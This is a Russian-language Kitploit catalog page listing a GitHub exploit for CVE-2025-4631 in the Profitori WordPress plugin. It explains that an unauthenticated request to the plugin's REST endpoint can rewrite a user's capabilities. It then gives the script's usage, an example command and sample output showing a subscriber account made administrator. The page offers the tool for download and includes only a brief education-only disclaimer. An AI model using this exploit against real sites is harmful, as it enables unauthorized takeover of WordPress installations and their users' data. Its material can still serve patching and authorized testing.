Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-4631
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий

Репозиторий
1111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-4631 - Эксплойт повышения привилегий для WordPress-плагина Profitori

📌 Сводка об уязвимости

Плагин Profitori (версии с 2.0.6.0 по 2.1.1.3) уязвим к неаутентифицированному повышению привилегий из-за отсутствия проверки прав доступа в конечной точке /wp-json/stocktend/v1/stocktend_object. Это позволяет удалённым злоумышленникам повышать привилегии существующих пользователей (или создавать новых) путём прямого изменения мета-поля wp_capabilities.

  • CVE: CVE-2025-4631
  • Оценка CVSS: 9.8 (Критическая)
  • Опубликовано: 30 мая 2025 г.
  • Обновлено: 31 мая 2025 г.

🛠️ Что делает этот скрипт

Этот эксплойт на Python автоматизирует процесс повышения привилегий:

  1. ✅ Проверяет версию плагина через файл readme.txt.
  2. 🚀 Эксплуатирует уязвимую конечную точку REST API, если обнаружена уязвимая версия.
  3. 📡 Отправляет полезную нагрузку для повышения привилегий пользователя до Администратора.
  4. 🧾 Выводит форматированные подробные результаты, включая учётные данные изменённого пользователя.

Если проверка версии завершается неудачей, эксплойт продолжает работу осторожно, с предупреждением.


📸 Доказательство работы эксплойта

Proof of Concept


💻 Использование

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

Пример:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

Пример вывода:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ Аргументы скрипта


📂 Требования

  • Python 3.x
  • библиотека requests

Установка:

root@kitploit:~
pip install requests

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования. Любое неправомерное использование этого эксплойта против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, строго запрещено. Автор не несёт ответственности за любой ущерб или юридические последствия, возникшие в результате неправильного использования.


Автор: Nxploited ( Khaled_Alenazi )

Скачать инструмент
FlagDescriptionRequired
-u, --url🌐 Базовый URL сайта WordPress✅ Да
-id🆔 ID пользователя для повышения привилегий✅ Да
--email📧 Поддельный email для отображения❌ Нет
--name👤 Отображаемое имя❌ Нет
--url_field🔗 Поле URL пользователя❌ Нет
--verbose🔍 Вывод полного JSON-ответа❌ Нет